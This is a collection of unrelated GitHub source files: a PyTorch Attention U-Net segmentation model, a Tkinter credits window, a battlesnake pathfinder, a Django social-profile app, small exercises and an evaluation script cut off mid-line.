InvertedResidual(in_channels, out_channels, act_layer=activation, se_ratio=0.25, exp_ratio=4)\n self.drop = DropBlock2D(drop_block_rate, 2)\n # self.conv1 = nn.Sequential(\n # nn.Conv2d(out_channels, out_channels, kernel_size=3, padding=1, bias=False),\n # nn.BatchNorm2d(out_channels),\n # activation(inplace=True),\n # )\n # self.conv2 = nn.Sequential(\n # nn.Conv2d(out_channels, out_channels, kernel_size=3, padding=1, bias=False),\n # nn.BatchNorm2d(out_channels),\n # activation(inplace=True),\n # )\n self.conv1 = nn.Sequential(\n DepthwiseSeparableConv2d(out_channels, out_channels, kernel_size=3, padding=1) ,\n nn.BatchNorm2d(out_channels),\n activation(inplace=True),\n )\n self.conv2 = nn.Sequential(\n DepthwiseSeparableConv2d(out_channels, out_channels, kernel_size=3, padding=1) ,\n nn.BatchNorm2d(out_channels),\n activation(inplace=True),\n )\n\n def forward(self, x):\n x = self.ir(x)\n x = self.drop(x)\n x = self.conv1(x)\n x = self.conv2(x)\n return x\n\n\nclass Up_Atten(nn.Module):\n def __init__(self, in_ch, out_ch, bilinear = True):\n super(Up_Atten, self).__init__()\n self.atten = Attention_block(F_g=in_ch // 2, F_l=out_ch, F_int=in_ch)\n self.up_conv = DoubleConv(in_ch // 2 + out_ch, out_ch)\n if bilinear:\n self.up = nn.Sequential(\n nn.Upsample(scale_factor=2, mode='bilinear', align_corners=True),\n nn.Conv2d(in_ch, in_ch // 2, kernel_size=3, padding=1)\n )\n else:\n self.up = nn.ConvTranspose2d(in_ch, in_ch // 2, kernel_size=4, stride=2, padding=1)\n self.out_ch = out_ch\n\n def forward(self, input1, input2):\n d2 = self.up(input1) \n d1 = self.atten(d2, input2)\n d2 = F.interpolate(d2, size=(d1.size(2), d1.size(3)), mode=\"bilinear\", align_corners=True)\n d = torch.cat([d1, d2], dim=1)\n return self.up_conv(d)\n \nclass Unet_Decoder(nn.Module):\n def __init__(self, encoder_channels, n_classes, dropout):\n super(Unet_Decoder, self).__init__()\n self.decoder_output = nn.ModuleList()\n encoder_channels = encoder_channels[::-1]\n array_1 = encoder_channels[:-1]\n array_2 = encoder_channels[1:]\n\n for i, (in_ch, out_ch) in enumerate(zip(array_1, array_2)):\n next_up = Up_Atten(in_ch, out_ch) \n self.decoder_output.append(next_up)\n self.dropout = nn.Dropout2d(dropout)\n self.out_conv = nn.Sequential(\n nn.Upsample(scale_factor=2, mode='bilinear', align_corners=True),\n OutConv(encoder_channels[-1], n_classes)\n )\n\n channels = [n_classes]\n channels += [feature.out_ch for feature in list(reversed(self.decoder_output))]\n self.channels = channels\n init_weights(self)\n \n def forward(self, encoder_features): \n decoder_features = [] \n reverse_features = encoder_features[::-1] \n up_decode = reverse_features[0]\n for i, feature in enumerate(reverse_features[1: ]):\n out_decode = self.decoder_output[i](up_decode, feature)\n decoder_features.append(out_decode)\n up_decode = out_decode\n final = self.dropout(up_decode)\n final = self.out_conv(final)\n decoder_features.append(final)\n return list(reversed(decoder_features))\n # return final\n\nclass Attention_Unet(nn.Module):\n \"\"\"\n Attention Unet with pretrained model.\n Resnet18, resnet34, resnet50, resnet101, wide_resnet, ... from timm package\n \"\"\"\n def __init__(self, n_classes, dropout, deep_supervision:bool, encoder: nn.Module):\n super(Attention_Unet, self).__init__()\n \n self.encoder = encoder\n encoder_channels = self.encoder.filters\n self.decoder = Unet_Decoder(encoder_channels, n_classes, dropout)\n self.deep_supervision = deep_supervision\n # if deep_supervision:\n self.supervision = nn.ModuleList([OutConv(channels, n_classes) for channels in self.decoder.channels])\n\n def forward(self, x):\n x, pad = pad_image_tensor(x, 32)\n H, W = x.size(2), x.size(3)\n\n #Encode\n encoder_outputs = self.encoder(x)\n #Decode\n decoder_outputs = self.decoder(encoder_outputs)\n # if the input is not divisible by the output stride\n final = decoder_outputs[0]\n if final.size(2) != H or final.size(3) != W:\n final = F.interpolate(final, size=(H, W), mode=\"bilinear\", align_corners=True)\n \n final = unpad_image_tensor(final, pad)\n prediction_list = []\n if self.deep_supervision:\n for feature_map, supervision in zip(decoder_outputs, self.supervision):\n prediction = supervision(feature_map)\n prediction_list.append(prediction)\n \n return final, prediction_list[1: ]\n else:\n return final\n\n def get_num_parameters(self):\n trainable= int(sum(p.numel() for p in self.parameters() if p.requires_grad))\n total = int(sum(p.numel() for p in self.parameters()))\n return trainable, total\n \n def get_paramgroup(self, base_lr=None, weight_decay=1e-5):\n lr_dict = {\n \"encoder\": [0.1, weight_decay],\n }\n \n lr_group = get_lr_parameters(self, base_lr, lr_dict)\n return lr_group\n\ndef seresnet50_attunet(num_classes=1, drop_rate=0.25, pretrained=True, freeze_bn=True, freeze_backbone=False, deep_supervision=False):\n encoder = Unet_Encoder(freeze_bn=freeze_bn, backbone='seresnet50', freeze_backbone=freeze_backbone, pretrained=pretrained)\n return Attention_Unet(n_classes=num_classes,dropout=drop_rate, encoder=encoder, deep_supervision=deep_supervision)\n\ndef seresnet50_attunet(num_classes=1, drop_rate=0.25, pretrained=True, freeze_bn=True, freeze_backbone=False, deep_supervision=False):\n encoder = Unet_Encoder(freeze_bn=freeze_bn, backbone='seresnet50', freeze_backbone=freeze_backbone, pretrained=pretrained)\n return Attention_Unet(n_classes=num_classes,dropout=drop_rate, encoder=encoder, deep_supervision=deep_supervision)\n\ndef resnet50_attunet(num_classes=1, drop_rate=0.25, pretrained=True, freeze_bn=True, freeze_backbone=False, deep_supervision=False):\n encoder = Unet_Encoder(freeze_bn=freeze_bn, backbone='resnet50', freeze_backbone=freeze_backbone, pretrained=pretrained)\n return Attention_Unet(n_classes=num_classes,dropout=drop_rate, encoder=encoder, deep_supervision=deep_supervision)\n\ndef efficientnetb2_attunet(input_channels = 3, num_classes=1, drop_rate=0.25, pretrained=True, freeze_bn=True, freeze_backbone=False, deep_supervision=False):\n encoder = Unet_Encoder(freeze_bn=freeze_bn, backbone='tf_efficientnet_b2', freeze_backbone=freeze_backbone, pretrained=pretrained)\n if input_channels != 3:\n encoder.change_input_channels(input_channels)\n return Attention_Unet(n_classes=num_classes,dropout=drop_rate, encoder=encoder, deep_supervision=deep_supervision)\n\ndef mobilenetv3_attunet(num_classes=1, drop_rate=0.25, pretrained=True, freeze_bn=True, freeze_backbone=False):\n encoder = Unet_Encoder(freeze_bn=freeze_bn, backbone='mobilenetv3_large_100', freeze_backbone=freeze_backbone, pretrained=pretrained)\n return Attention_Unet(n_classes=num_classes,dropout=drop_rate, encoder=encoder)\n\ndef swin_tiny_attunet(num_classes=1, drop_rate=0.25, drop_block_rate=0.1, pretrained=True, freeze_bn=True, freeze_backbone=False, deep_supervision=False):\n encoder = Unet_Encoder(backbone='swin_tiny_patches4_window7_224', freeze_bn=freeze_bn, freeze_backbone=freeze_backbone, pretrained=pretrained)\n return Attention_Unet(n_classes=num_classes,dropout=drop_rate, drop_block_rate=drop_block_rate, deep_supervision=deep_supervision, encoder=encoder)\n\ndef swin_small_attunet(num_classes=1, drop_rate=0.25, drop_block_rate=0.1, pretrained=True, freeze_bn=True, freeze_backbone=False, deep_supervision=False):\n encoder = Unet_Encoder(backbone='swin_small_patches4_window7_224', freeze_bn=freeze_bn, freeze_backbone=freeze_backbone, pretrained=pretrained)\n return Attention_Unet(n_classes=num_classes,dropout=drop_rate, drop_block_rate=drop_block_rate, deep_supervision=deep_supervision, encoder=encoder)\n\nif __name__ == '__main__':\n model = resnet50_attunet(1, deep_supervision=True).cuda()\n a = torch.randn(1, 3, 1024, 1024).cuda()\n output, deep_output = model(a)\n # for o in output:\n # print(o.shape\n # \n # )\n print(output.shape)\n for fea in deep_output:\n print(fea.shape)\n # decoder = model.decoder\n # decoder_fea = decoder.channels\n # for chn in decoder_fea:\n # print(chn)\n","repo_name":"duylebkHCM/EyeDiseaseSegmentation","sub_path":"src/main/archs/attentionunet.py","file_name":"attentionunet.py","file_ext":"py","file_size_in_byte":12163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"26669696414","text":"\"\"\"\nCreated on May 3, 2018\n\n@author: Thomas Hopkins and Rania Jameel\n\"\"\"\nfrom tkinter import *\n\n\nclass Credits(Frame):\n \"\"\"A window for showing project credits.\"\"\"\n def __init__(self):\n # Setup the window frame (Title, grid, etc)\n Frame.__init__(self)\n self.option_add('*Font', 'arial 12')\n self.pack(expand=YES)\n self.text = \"\"\"\nCreated by Thomas Hopkins\n and Rania Jameel\n\nUses dependencies:\n SymPy (www.sympy.org)\n numpy (www.numpy.org)\n\nSpecial thanks to:\n Professor McKanry (Rex)\n\n\n\n\n\n\n\n\n\n\n\n\n 2018\n\"\"\" \n self.creditslabel = Label(self, text=self.text, justify='left')\n self.creditslabel.pack()\n","repo_name":"Thomas-Hopkins/Python-FinalProject-Fall2018","sub_path":"src/calculatorCredits.py","file_name":"calculatorCredits.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"29053063232","text":"class Solution:\n def numberOfRounds(self, loginTime: str, logoutTime: str) -> int:\n\n login = int(loginTime[:2]) * 60 + int(loginTime[3:])\n logout = int(logoutTime[:2]) * 60 + int(logoutTime[3:])\n\n if logout < login:\n logout += 24 * 60\n\n while login % 15:\n login += 1\n\n while logout % 15:\n logout -= 1\n\n return max((logout - login) // 15, 0)\n\n# Time: O(1)\n# Space: O(1)\n","repo_name":"kutaycinar/leetcode","sub_path":"python/1904_the-number-of-full-rounds-you-have-played.py","file_name":"1904_the-number-of-full-rounds-you-have-played.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"5336075790","text":"import json as j\nimport yaml as y\nfrom uhclib import itemenc, kitenc\n\ndef main(ifile, ofile):\n\titem = str();\n#\tcase = int(ifile.readline().strip(\"\\n\"));\n\tkits = dict();\n\twhile True:\n\t\tpro = ifile.readline();\n\t\twhile pro == '\\n':\n\t\t\tpro = ifile.readline();\n\t\tpro = pro.strip(\"\\n\");\n\t\tif pro[0] == '0':\n\t\t\tbreak;\n\t\tif pro.find(\"(\")==-1:\n\t\t\tpro = pro.split();\n\t\t\tcitem = int(pro[0]);\n\t\t\tidn = pro[1];\n\t\t\titem = itemenc(pro[2]);\n\t\t\tname = pro[3];\n\t\telse:\n\t\t\tpros = pro.split();\n\t\t\tcitem = int(pros[0]);\n\t\t\tidn = pros[1];\n\t\t\tname = pros[-1];\n\t\t\titem = str();\n\t\t\tfor i in pros[2:-1]:\n\t\t\t\titem += i;\n\t\t\titem = itemenc(item);\n\t\titems = list();\n\t\tfor cnti in range(citem):\n\t\t\tkitem = ifile.readline().strip(\"\\n\");\n\t\t\tind = kitem.rfind(' ');\n#\t\t\tsitem = kitem.split();\n\t\t\tif (ind!=-1) and (kitem[ind+1:].isdigit()):\n\t\t\t\titems.append(itemenc(kitem[:ind], int(kitem[ind+1:])));\n\t\t\telse:\n\t\t\t\titems.append(itemenc(kitem));\n\t\t\n\t\tkit = kitenc(item, name, items);\n\t\tkits[idn] = kit;\n\t\n\tofile.write(y.dump({\"kits\":kits}));\n\nif __name__ == \"__main__\":\n\tifile = open(\"kits.in\", \"r\");\n\tofile = open(\"kits.yml\", \"w\");\n#\tifile = open(input(\"input file:\"), \"r\");\n#\tofile = open(input(\"output file:\"), \"w\");\n\tmain(ifile, ofile);\n\tifile.close();\n\tofile.close();\n\tprint(\"解析完成,已存储为 kits.yml\\n是否写入 ./plugins/UhcCore/kits.yml [Y/n] : \", end='')\n\tif input()[0]=='Y':\n\t\tifile = open(\"kits.in\", \"r\");\n\t\tofile = open(\"plugins/UhcCore/kits.yml\", \"w\");\n\t\tmain(ifile, ofile);\n\t\tifile.close();\n\t\tofile.close();\n\n","repo_name":"HuashuiZhuanyong/UhcCoreHelper","sub_path":"kits.py","file_name":"kits.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"23435243142","text":"from utils.MarbalRunner import MarbalRunner\nimport time\nimport datetime\nif __name__==\"__main__\":\n init_pos=[30.0,20.0,np.pi/2]\n robot = MarbalRunnerST(init_pos,[0,0])\n t=1\n initialT = datetime.datetime.now()\n while 1:\n robot._updateLoc()\n v_desired = 0.5\n w_desired = 0 #desired w to face to the target\n print(\"desired val\",v_desired,w_desired)\n duty_cycle_l, duty_cycle_r = robot.robot_controller.drive(v_desired,w_desired,robot.w[0],robot.w[1]) #contorl\n robot._pwmL.value = abs(duty_cycle_l)\n robot._pwmR.value = abs(duty_cycle_r)\n robot._setDirL(duty_cycle_l>0)\n robot._setDirR(duty_cycle_r>0)\n time.sleep(2*CONST.dt)\n if (datetime.datetime.now()-initialT)>t:\n break\n print(robot.pos)\n\n robot._pwmL.value = 0\n robot._pwmR.value = 0\n\n ","repo_name":"AndyLi-26/Marble_collector","sub_path":"tests/goStraightTest.py","file_name":"goStraightTest.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"39180012164","text":"\"\"\"Write code that translates a name into (simplified) Pig Latin. \n(Please do not make this a 'real' Pig Latin translator.) \nHave your script ask the user for his or her name, which can comprise \nfirst, middle, and/or last parts. For each name part, move the first letter to \nthe end of the part and append the letters \"ay\". Make sure that only the first \nletter of each word in your output is capitalized. You can use the split() \nmethod on the string to create a list of the name parts. Be sure that your \nscript can handle one, two or three name parts separated by spaces. \nThis will likely involve a loop.\nYour script should re-create the following example exactly:\n \nEnter your name: Paul Laskowski\n\nAulpay Askowskilay\"\"\"\n# User enters their name.\nname_input = input('Please enter your name: ')\nprint('\\n')\n# Create a list from user input, split the name between the spaces.\nname_list = name_input.split(' ')\n# Determine the number of items in the list.\ni = 0\nj = len(name_list)\nwhile i < j:\n name_pig_latin = name_list[i][1].upper() + name_list[i][2:].lower() + \\\n name_list[i][0].lower() + 'ay'\n print(name_pig_latin, end=' ')\n i += 1","repo_name":"sagotechnology/Data-Science-Programming","sub_path":"05_Course-Content/week_03/python_programs/pig_latin_translator.py","file_name":"pig_latin_translator.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36174254588","text":"# This will deal with the movement of the snake\nimport snakeinfo as si\nimport getFood\nfrom pathfinding.core.diagonal_movement import DiagonalMovement\nfrom pathfinding.core.grid import Grid\nfrom pathfinding.finder.a_star import AStarFinder\nfrom pathfinding.finder.best_first import BestFirst\nfrom pathfinding.finder.bi_a_star import BiAStarFinder\ndirections = ['up', 'down', 'left', 'right']\n\ndef followTail(x, y):\n tailX = x\n tailY = y\n tailPoint = (tailX, tailY)\n return tailPoint\n\ndef checkHealth(health):\n if health >= 80:\n print(\"true\")\n return True\n\n\ndef findFood(board, x, y):\n foodToEat = (board.food[1]['x'],board.food[1]['y'])\n for food in board.food:\n if((abs(food['x'] - x) + abs(food['y'] - y)) < abs((foodToEat[0] - x) + abs(foodToEat[1] - y))):\n foodToEat = (food['x'], food['y'])\n return foodToEat\n \n\ndef is_empty(any_structure):\n if any_structure:\n print('Structure is not empty.')\n return False\n else:\n print('Structure is empty.')\n return True\n\ndef generatePath(grid, data):\n grid = Grid(matrix=grid)\n \n \n # Board class declaration\n board = si.board (\n data['board']['height'], \n data['board']['width'],\n data['board']['food'],\n data['board']['snakes'],\n data['board']['snakes'][0]\n )\n \n width = board.width\n height = board.height\n foodPos = board.food\n allSnakes = board.snakes\n enemyHealth = board.health\n\n # Our snakes class declaration\n ourSnake = si.ourSnake (\n data['you']['id'],\n data['you']['name'],\n data['you']['health'],\n data['you']['body'],\n data['you']['body'][0]['x'],\n data['you']['body'][0]['y'],\n data['you']['body'][-1]['x'],\n data['you']['body'][-1]['y']\n )\n\n # for snake in board.snakes:\n # print(snake)\n # print(board.food)\n # print(data)\n sid = ourSnake.sid\n name = ourSnake.name\n ourHealth = ourSnake.health\n ourBody = ourSnake.body\n ourX = ourSnake.x\n ourY = ourSnake.y\n tailX = ourSnake.tailX\n tailY = ourSnake.tailY\n start = grid.node(ourX, ourY)\n\n if(len(board.food) == 0):\n state = 3\n print(ourBody)\n if (len(ourBody) > 3 and (ourHealth >= 50)):\n print(\"In Second State\")\n state = 2\n else:\n state = 1\n\n tailPoint = followTail(tailX, tailY)\n # foodToEat[0], foodToEat[1]\n \n # print(tailPoint[1])\n # print(ourHealth)\n # if (checkHealth(ourHealth)):\n # state = 2\n foodToEat = findFood(board, ourX, ourY)\n end = grid.node(foodToEat[0], foodToEat[1])\n finder = BiAStarFinder(diagonal_movement=DiagonalMovement.only_when_no_obstacle)\n best_path = BestFirst()\n\n if(state == 1):\n print(\"state 1\")\n foodToEat = findFood(board, ourX, ourY)\n print (tailPoint)\n end = grid.node(foodToEat[0], foodToEat[1])\n state = 2\n\n elif(state == 2):\n print(\"state 2\")\n end = grid.node(tailPoint[0], tailPoint[1])\n\n elif(state == 3):\n print(\"state 3\")\n end = grid.node(tailPoint[0], tailPoint[1])\n \n finder = BiAStarFinder(diagonal_movement=DiagonalMovement.only_when_no_obstacle)\n best_path = BestFirst()\n path, runs = finder.find_path(start, end, grid)\n print(path)\n next_path = path[1] \n if (is_empty(next_path)):\n print(\"Invalid Move.... Remapping\")\n end = grid.node(tailPoint[0], tailPoint[1])\n finder =BiAStarFinder(diagonal_movement=DiagonalMovement.only_when_no_obstacle)\n best_path = BestFirst()\n path, runs = finder.find_path(start, end, grid)\n\n # print(start)\n # print(next_path)\n # print(next_path[0], next_path[1])\n # print(start.x + 1)\n print ('operations: ', runs, 'path length: ', len(path))\n print(grid.grid_str(path=path, start=start, end=end))\n\n if (next_path[0] == start.x + 1):\n # print (\"Right?\")\n return 3\n\n elif (next_path[0] == start.x - 1):\n # print (\"Left\")\n return 2\n \n elif (next_path[1] == start.y + 1):\n # print (\"Up\")\n return 1\n\n else:\n # print (\"Down\")\n return 0\n\n","repo_name":"LiyaniL/Battlesnake-2019","sub_path":"app/move.py","file_name":"move.py","file_ext":"py","file_size_in_byte":4196,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"74816647781","text":"\"\"\"exercise\"\"\"\n\ndef grep(pattern, flags, files):\n \"\"\"\n :param pattern:\n :param flags:\n :param files:\n :return:\n \"\"\"\n\n flags = set(flags.split(' '))\n\n matches = []\n\n for file in files:\n included = False\n with open(file, encoding=\"utf-8\") as handle:\n for line, text in enumerate(handle.readlines()):\n if \"-i\" in flags and \"-x\" in flags:\n matched = pattern.lower() == text.lower().rstrip()\n elif \"-i\" in flags:\n matched = pattern.lower() in text.lower()\n elif \"-x\" in flags:\n matched = pattern == text.rstrip()\n else:\n matched = pattern in text\n\n if \"-v\" in flags:\n matched = not matched\n\n if matched:\n if \"-l\" in flags:\n text = file + \"\\n\"\n matched = True if not included else False\n included = True\n elif \"-n\" in flags:\n text = f'{line+1}:{text}'\n\n if len(files) > 1 and not \"-l\" in flags:\n text = f'{file}:{text}'\n\n if matched:\n matches.append(text)\n\n return \"\".join(matches)\n","repo_name":"Tedford/Exercism","sub_path":"python/grep/grep.py","file_name":"grep.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"12353615948","text":"\"\"\"Acre URL Configuration\n\"\"\"\nfrom api import views as api_views\nfrom django.urls import include, path\nfrom rest_framework_swagger.views import get_swagger_view\n\napi_v1_patterns = [\n path('docs/', get_swagger_view(title='Acre API')),\n path('instruments', api_views.InstrumentsView.as_view()),\n path('trading_day/current', api_views.get_current_trading_day),\n path('algos', api_views.get_all_algos),\n path('algos/update/end_of_day', api_views.end_of_day_update),\n path('algos/update/clean', api_views.clean_predictions),\n path('algos//profitable_changes',\n api_views.ProfitableChangesView.as_view()),\n path('algos//predicted_changes',\n api_views.PredictedChangesView.as_view()),\n]\n\nurlpatterns = [\n path('v1/', include(api_v1_patterns)),\n]\n","repo_name":"yizhang7210/Acre","sub_path":"server/acre/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"29235146729","text":"# логарифмическая сложность: бинарный поиск\nfrom LIB.tm import pstopwatch\nfrom funcs import *\n\nprint( 'Создание списков...' )\nlst1 = list ( range(10_000) )\nlst2 = list ( range(100_000) )\nlst3 = list ( range(1000_000) )\nlst4 = list ( range(100_000_000) )\nprint( 'Списки созданы.\\n\\n' )\n\n# поиск в списках\nt1, ind1 = pstopwatch( bin_search, lst1, 567, title='Поиск в 10 тыс. чисел...' )\nt2, ind2 = pstopwatch( bin_search, lst2, 5678, title='Поиск в 100 тыс. чисел...' )\nt3, ind3 = pstopwatch( bin_search, lst3, 56789, title='Поиск в 1 млн. чисел...' )\nt4, ind4 = pstopwatch( bin_search, lst4, 5678987, title='Поиск в 100 млн. чисел...' )\n\n# вывести результат\nprint( 'Для 10 тыс: \\t{:.12f} (индекс {})'.format(t1, ind1) )\nprint( 'Для 100 тыс: \\t{:.12f} (индекс {})'.format(t2, ind2) )\nprint( 'Для 1 млн: \\t{:.12f} (индекс {})'.format(t3, ind3) )\nprint( 'Для 10 млн: \\t{:.12f} (индекс {})'.format(t4, ind4) )\n\n\n","repo_name":"AlchiProMent/PythonPro","sub_path":"timings/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"35929658269","text":"def check(sp, tp):\n s = set()\n for i in range(len(sp)):\n ys, xs = sp[i]\n yt, xt = tp[i]\n s.add((ys-yt, xs-xt))\n\n return len(s) == 1\n\ndef rotate(sp):\n ret = []\n\n for y, x in sp:\n ret.append((x, N-y-1))\n\n return ret\n\nN = int(input())\nS = [list(input()) for _ in range(N)]\nT = [list(input()) for _ in range(N)]\nsp = []\ntp = []\nfor i in range(N):\n for j in range(N):\n if S[i][j] == \"#\":\n sp.append((i, j))\n if T[i][j] == \"#\":\n tp.append((i, j))\ntp.sort()\n\nif len(sp) != len(tp):\n print(\"No\")\n exit()\n\ndef debug(sp):\n print()\n for i in range(N):\n for j in range(N):\n if (i, j) in sp:\n print(\"#\", end=\"\")\n else:\n print(\".\", end=\"\")\n print()\n print()\n\nfor i in range(4):\n # debug(sp)\n if check(sorted(sp), tp):\n print(\"Yes\")\n exit()\n sp = rotate(sp)\n\nprint(\"No\")\n","repo_name":"wonda-tea-coffee/competitive_programming.py","sub_path":"atcoder/abc218_c.py","file_name":"abc218_c.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"3436793105","text":"from django.db import models\n\n# factory settings\nfrom django.conf import settings\n\n# User model from django auth app\nfrom django.contrib.auth.models import User\n\n#generic relation\nfrom django.contrib.contenttypes.fields import GenericRelation\n\n# timezone\nfrom django.utils import timezone\n\n# reverse the parent content\nfrom django.urls import reverse\n\n#PIL\nfrom PIL import Image\n\nfrom feedaggregate.models import RemoteFeed\n\n\nclass Interest(models.Model):\n INTEREST_CHOICES =[\n (0,'Science'),\n (1,'Maths'),\n (2,'Computer'),\n (3,'History'),\n (4,'Health'),\n ]\n interest_id = models.PositiveSmallIntegerField(\n choices = INTEREST_CHOICES,\n primary_key= True,\n )\n\n def __str__(self):\n return self.get_interest_id_display() \n\n\nclass Profile(models.Model):\n '''\n Profile specifies the Profile table in the database.\n Here the attributes are:\n - user: foreign key to User model defined in the admin app\n - profile_picture: image of the profile\n\n It refers to the social profile of the user. These fields are\n extensible for future.\n '''\n WORKING_STATUS_CHOICES= [\n ('student', 'Student'),\n ('teacher', 'Teacher'),\n ('none', 'Prefer no to say'),\n ]\n\n user = models.OneToOneField(\n User,\n on_delete=models.CASCADE,\n related_name='profile',\n primary_key=True\n )\n profile_picture = models.ImageField(\n upload_to='profile_picture',\n blank=True,\n null= True\n )\n following = models.ManyToManyField(\n 'self',\n through='Follow',\n related_name='followers',\n symmetrical=False\n )\n bio = models.TextField(blank = True, null = True)\n current_status = models.CharField(\n max_length=10,\n choices = WORKING_STATUS_CHOICES,\n blank = True, null = True\n )\n interest = models.ManyToManyField(\n Interest\n )\n contact_email = models.EmailField(max_length=255,blank=True,null=True)\n\n remote_feed = GenericRelation(RemoteFeed,related_name=\"remotefeed\",related_query_name=\"feed_creator\") \n\n def get_absolute_url(self):\n '''\n This method when applied to Profile object in templates as\n object.get_absolute_url (default) will dynamically generate detail\n view url assosicated with profile username.\n '''\n return reverse('user_detail', kwargs={'username':self.user.username})\n\n def get_followers(self):\n return self.following.all()\n\n def get_followings(self):\n return Profile.objects.filter(followers=self).all()\n\n # def save(self, *args, **kwargs):\n # super().save(*args, **kwargs)\n \n # profile_img = Image.open(self.profile_picture.path)\n \n # if profile_img.width > 400 or profile_img.height > 400:\n # crop_size = (400,400)\n # profile_img.thumbnail(crop_size)\n # profile_img.save(self.profile_picture.path)\n\n def __str__(self):\n return f\"{self.user.username}\"\n\n\nclass Follow(models.Model):\n profile_from = models.ForeignKey(\n Profile,\n on_delete=models.CASCADE,\n related_name='follow_from',\n )\n profile_to = models.ForeignKey(\n Profile,\n on_delete=models.CASCADE,\n related_name='follow_to',\n )\n created_on = models.DateTimeField(\n auto_now_add=True,\n db_index=True)\n\n \n class Meta:\n ordering = ('-created_on',)\n\n\n def __str__(self):\n return f'{self.profile_from} follows {self.profile_to}'\n\n\n","repo_name":"azwyane/Patralaya","sub_path":"apps/profiles/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3579,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"22549740867","text":"\"\"\"Merges output form Morfeusz woth reference data.\"\"\"\nfrom argparse import ArgumentParser\nfrom typing import List, Tuple\n\nimport jsonlines\n\nfrom ktagger import KText\n\n\n\n\ndef get_input_paragraphs(path):\n segments = []\n with open(path) as f:\n for line in f:\n line = line.rstrip()\n if line == '':\n yield segments\n segments = []\n else:\n fields = line.split('\\t')\n assert len(fields) == 7\n token = fields[0]\n ambig = int(fields[5])\n pred = int(fields[6])\n segments.append((token, ambig, pred))\n if segments:\n yield segments\n return segments\n\n\ndef paragraphs(path):\n segments = []\n with open(path) as f:\n for line in f:\n line = line.rstrip()\n if line == '':\n yield segments\n segments = []\n else:\n fields = line.split(' ')\n # print(len(fields), fields)\n assert len(fields) in (3, 4)\n token = fields[0]\n pred = int(fields[2])\n segments.append((token, pred))\n if segments:\n yield segments\n return segments\n\n\ndef get_reference_offsets(paragraph: KText):\n text = ''\n end_offsets = []\n last_offset = 0\n for token in paragraph.tokens:\n if token.has_disamb() or len(token.interpretations)==0: # in UGC missing interpretations\n form = token.form.replace(' ', '')\n end_offsets.append((last_offset, last_offset + len(form)))\n last_offset += len(form)\n text += form\n return end_offsets, text\n\n\ndef get_predicted_offsets(paragraph: List[Tuple[str, int]]):\n text = ''\n end_offsets = []\n last_offset = 0\n last_start_offset = 0\n for token, decision in paragraph:\n text += token\n if decision == 1:\n end_offsets.append((last_start_offset, last_offset + len(token)))\n last_start_offset = last_offset + len(token)\n last_offset += len(token)\n return end_offsets, text\n\n\ndef get_input_offsets(paragraph: List[Tuple[str, int, int]]):\n text = ''\n end_offsets = []\n last_offset = 0\n last_start_offset = 0\n for token, ambig, decision in paragraph:\n token = token.replace(' ', '')\n text += token\n if decision == 1:\n end_offsets.append((last_start_offset, last_offset + len(token)))\n last_start_offset = last_offset + len(token)\n last_offset += len(token)\n return end_offsets, text\n\n\ndef get_input_unambig_offsets(paragraph: List[Tuple[str, int, int]]):\n text = ''\n unambig_offsets = []\n last_offset = 0\n prev_ambig = False\n for token, ambig, decision in paragraph:\n text += token\n if ambig == 0:\n if not prev_ambig:\n unambig_offsets.append((last_offset, last_offset + len(token)))\n prev_ambig = False\n else:\n prev_ambig = True\n last_offset += len(token)\n return unambig_offsets, text\n\ndef get_input_wospace_offsets(paragraph: List[Tuple[str, int, int]]): #TODO\n text = ''\n unambig_offsets = []\n last_offset = 0\n prev_ambig = False\n for token, ambig, decision in paragraph:\n text += token\n if ambig == 0:\n if not prev_ambig:\n unambig_offsets.append((last_offset, last_offset + len(token)))\n prev_ambig = False\n else:\n prev_ambig = True\n last_offset += len(token)\n return unambig_offsets, text\n\ndef score(tp, fp, fn):\n print(f\"TP: {tp} FP: {fp} FN: {fn}\")\n precision = tp / (tp + fp) if tp + fp > 0 else 0.0\n recall = tp / (tp + fn) if tp + fn > 0 else 0.0\n f1 = 2 * precision * recall / (precision + recall) if precision + recall > 0 else 0.0\n print(f\"Precision: {precision * 100:.4f} Recall: {recall * 100:.4f} F1: {f1 * 100:.4f}\")\n return precision, recall, f1\n\n\ndef calculate(disamb_path, pred_path, ambig_path):\n if 'jsonl' in disamb_path:\n reference_paragraphs = []\n with jsonlines.open(disamb_path) as reader:\n for data in reader:\n ktext = KText.load(data)\n # ktext.find_ambiguous_end_offsets()\n reference_paragraphs.append(ktext)\n\n refs = {}\n for ref in reference_paragraphs:\n ref_offsets, text = get_reference_offsets(ref)\n refs[text] = set(ref_offsets)\n elif 'tsv' in disamb_path:\n reference_paragraphs = list(get_input_paragraphs(disamb_path))\n refs = {}\n for pred in reference_paragraphs:\n input_offsets, text = get_input_offsets(pred)\n refs[text] = set(input_offsets)\n\n predicted_paragraphs = list(paragraphs(pred_path))\n assert len(predicted_paragraphs) == len(reference_paragraphs)\n input_paragraphs = list(get_input_paragraphs(ambig_path))\n assert 